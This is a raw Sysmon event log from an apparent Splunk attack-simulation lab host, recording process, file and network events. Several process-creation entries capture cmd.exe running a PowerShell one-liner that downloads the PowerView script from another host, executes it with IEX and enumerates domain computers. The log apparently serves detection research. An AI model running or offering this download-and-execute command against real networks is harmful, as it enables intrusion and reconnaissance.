Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+141997|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f 10341000x800000000000000035086040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:56.887{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+141997|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 23542300x800000000000000035086039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:56.887{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF71860571.TMPMD5=80D2028940892EB0B825AD2D8C8015CA,SHA256=4DD349D08FFD72024F455B053513402E406D7132CA573412DC85EEBC52CFD7A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:56.119{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AED3BDFA84A2D713D096C6F88F34A19B,SHA256=07B509CD0032BF44A84268FCD655473295BFF7FF8A42834D6215A5D9DE38EAFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:20.181{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56790-false10.0.1.12-8000- 23542300x800000000000000035086045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:57.133{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F00922480ED65EA84D599C305C78432C,SHA256=F1E3901E3A5E49B504FB53D6CB7B291B394A46515740732255F4EC9CBE670DAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:20.999{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56791-false10.0.1.12-8089- 23542300x800000000000000035086047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:58.888{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=89380F74A992BB6D98B4BC49D54ABB36,SHA256=7115A851F641B0DF4384F1C1130DA663BBE069F4BCBFE6D850AD197CB6FF59FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:58.150{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA27AF547E5DC22D4D429B8ED5148684,SHA256=564A6E93588A2B2071590FF53721A5013D56EBA4E701A2A95254EC00FC493F6C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:59.172{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F76A195006301A113BBC2D88EDAC5297,SHA256=3573C51C419D4ED2EF513E5B3B2B893083BA964CC4005FEEC32523E9901FA626,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:23.896{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56792-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:00.187{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7151035089070FFC4F374330C109CB5,SHA256=C5A7597EE6971D17EA77A1F4AFEA758428379AEEBA51BA614FAA3850CA2AEAA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:01.233{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B173509CABC2B6ACF8179DBC3499F08A,SHA256=F2D80448A04FE8F76AC1AF29C94348397492328C297DF461CBC23D609DE3BAF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:02.252{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA06E66E3ADD14D0B3529CA588F8E64C,SHA256=206EB3980EDADDF3A63AEC21B1252C0C0EDF7CCA3AC22C445BE72B36F775EE02,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:26.212{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56793-false10.0.1.12-8000- 11241100x800000000000000035086072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.968{B81B27B7-4FDB-613A-7D90-03000000C801}6916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_zxmri55u.bch.ps12021-09-09 18:18:03.968 10341000x800000000000000035086071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.952{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4FDB-613A-7D90-03000000C801}6916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.915{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4FDB-613A-7D90-03000000C801}6916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-4FDB-613A-7D90-03000000C801}6916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4FDB-613A-7C90-03000000C801}6884776C:\Windows\system32\cmd.exe{B81B27B7-4FDB-613A-7D90-03000000C801}6916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.912{B81B27B7-4FDB-613A-7D90-03000000C801}6916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -C "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.16:8000/PowerView.ps1');Get-DomainComputer"C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-4FDB-613A-7C90-03000000C801}6884C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe -C "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.16:8000/PowerView.ps1');Get-DomainComputer" 10341000x800000000000000035086062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4FDB-613A-7C90-03000000C801}6884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-4FDB-613A-7C90-03000000C801}6884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.899{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4FDB-613A-7C90-03000000C801}6884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035086055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.905{B81B27B7-4FDB-613A-7C90-03000000C801}6884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe -C "IEX (New-Object 